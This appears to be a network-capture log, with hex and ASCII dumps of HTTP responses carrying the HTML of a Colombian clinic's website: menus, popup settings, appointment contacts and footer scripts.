2023-03-22 04:45:33 UTC	997	IN	Data Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 Data Ascii: menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="
2023-03-22 04:45:33 UTC	998	IN	Data Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 Data Ascii: ></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-ti
2023-03-22 04:45:33 UTC	1000	IN	Data Raw: 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 Data Ascii: -item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-conte
2023-03-22 04:45:33 UTC	1001	IN	Data Raw: 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 Data Ascii: content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div
2023-03-22 04:45:33 UTC	1002	IN	Data Raw: 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e Data Ascii: ef="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul>
2023-03-22 04:45:33 UTC	1004	IN	Data Raw: 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 Data Ascii: tem-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-i
2023-03-22 04:45:33 UTC	1005	IN	Data Raw: 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d Data Ascii: menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item
2023-03-22 04:45:33 UTC	1006	IN	Data Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e Data Ascii: enu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-men
2023-03-22 04:45:33 UTC	1008	IN	Data Raw: 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f Data Ascii: .gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup background co
2023-03-22 04:45:33 UTC	1009	IN	Data Raw: 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 Data Ascii: //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-ov
2023-03-22 04:45:33 UTC	1010	IN	Data Raw: 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79 Data Ascii: ).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img sty
2023-03-22 04:45:33 UTC	1012	IN	Data Raw: 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64 69 63 61 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 34 22 3e 41 67 65 Data Ascii: "><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-medica" class="button button-4">Age
2023-03-22 04:45:33 UTC	1013	IN	Data Raw: 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 31 22 3e 0a 3c 69 6d 67 20 73 72 63 3d Data Ascii: iv></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-animatedblock-animation-1"><img src=
2023-03-22 04:45:33 UTC	1014	IN	Data Raw: 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 Data Ascii: </div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content
2023-03-22 04:45:33 UTC	1016	IN	Data Raw: 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 Data Ascii: class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage
2023-03-22 04:45:33 UTC	1017	IN	Data Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: /div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="
2023-03-22 04:45:33 UTC	1018	IN	Data Raw: 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 Data Ascii: a de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Ate
2023-03-22 04:45:33 UTC	1020	IN	Data Raw: 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 Data Ascii: ass="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-c
2023-03-22 04:45:33 UTC	1021	IN	Data Raw: 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f Data Ascii: -container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></
2023-03-22 04:45:33 UTC	1022	IN	Data Raw: 34 39 66 0d 0a 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 Data Ascii: 49fe" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px;
